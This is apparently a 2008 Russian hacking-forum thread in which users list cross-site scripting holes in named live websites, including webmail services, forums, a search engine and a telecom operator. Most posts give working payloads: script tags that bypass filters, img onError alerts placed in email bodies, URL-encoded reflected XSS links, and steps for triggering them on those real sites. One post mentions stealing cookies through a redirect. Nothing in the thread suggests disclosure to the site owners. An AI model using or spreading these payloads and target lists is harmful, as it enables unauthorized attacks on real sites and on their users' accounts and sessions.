от нее смысла нету. куки она не передает так как куки идут с блогера. только если связку ставить или редирект

Calcutta
13.08.2008, 13:49
http://mymail-in.net/
срабатывает 11 XSS в теле письма. проверено с помощью "SMTP XSS Tester v1.0"
// Наверное это можно считать за активную xss?

echobyte
13.08.2008, 20:58
http://nexile.ru/href/5713.html

В обьявлениях фильтруется script
соответственно "><scr<script>ipt>alert()</scr</script>ipt>

Calcutta
14.08.2008, 09:59
Сервер: mail.km.ru
зарегал мыло на http://bossmail.ru/
создаем письмо, вписываем в него алерты с таким телом письма:
<body>
<img src="a"onError=alert(121)>
<img src='a'onError=alert(122)>
<img src=javascript :alert(79)>
<img src=javascript :alert(68)>
<img src=javascript :alert(57)>
<img src=javascript:alert(46)>
<img src=javascript:alert(16)>
</body>
открываем письмо у себя в папке или отправляем его с небольшими изменениями ; )

echobyte
14.08.2008, 18:54
http://fotocelebrity.net/anna-seminovich/anna-seminovich27.php

NApoleonchik
15.08.2008, 16:39
PR 2
тИЦ 10

http://www.auto-magnitola.ru/forum/index.php

Уязвимы все поля в форуме. Ничего не фильтруется

))

diznt
24.08.2008, 17:35
Вот нашол свою первую XSS

Онлайн игра azona.ru

Идем на сайт azona.ru регаемся дальше вводим любые данные кроме маила
потом в маиле вбиваете "><script>alert('XSS')</script>" (без ковычек)
и вот XSS

ЗЫ вроде туда запостил если нет переместите в нужный раздел

x-demon
24.08.2008, 22:03
Вот нашол свою первую XSS

Онлайн игра azona.ru

Идем на сайт azona.ru регаемся дальше вводим любые данные кроме маила
потом в маиле вбиваете "><script>alert('XSS')</script>" (без ковычек)
и вот XSS

ЗЫ вроде туда запостил если нет переместите в нужный раздел
Это пассивка вроде
А поля там все уязвимы..

echobyte
27.08.2008, 15:21
http://hnu.univerlife.com/prepods/comps/14672/

winstrool
28.08.2008, 08:27
Екатеринбурский крупнейший портал города:
www.e1.ru - там есть такая штука как фотоальбом, так в фотоальбоме к фотографиям есть поле "Название" к фотографиямесле там уязвимое поле под XSS

echobyte
31.08.2008, 21:52
http://www.rozetka.com.ua/ru/products/comments/9217/index.html

Sn@k3
07.09.2008, 18:21
пассивные
http://noxak.ru/snak3_find.html , но на SMSline.Biz .
там стоит уже алерт. указываем телефон и гоу, да хоть алерт в форму телефона.


Довольно-таки крупный поисковик.
http://wwjd.ru/search.php?q=%22%3E%3Cscript%3Ealert%28%29%3B%3C%2 Fscript%3E
14 алертов

BlackSun
11.09.2008, 22:25
Активная xss (http://images.qwnet.ru/pictures/blacksun/thumbnails/xss_medium.jpg) в почтовике http://www.email.ro
Шлем в теле письма: <img src=1.gif onerror=xss>

iddqd
20.09.2008, 16:23
wow.citynov.ru

http://wow.citynov.ru/index.php?n=account&sub=pms

В личных сообщениях не фильтруется поле "Тема".

iddqd
22.09.2008, 17:48
Estemail.com.ua - полуплатная говнопочта.

Тупо не фильтруется поле "Тема" в письме.

DJ ][akep
22.09.2008, 21:31
Универсальный оператор связи.
http://eltel.net/news/announcements/?id=%3Cscript%3Ealert('xss')%3C/script%3E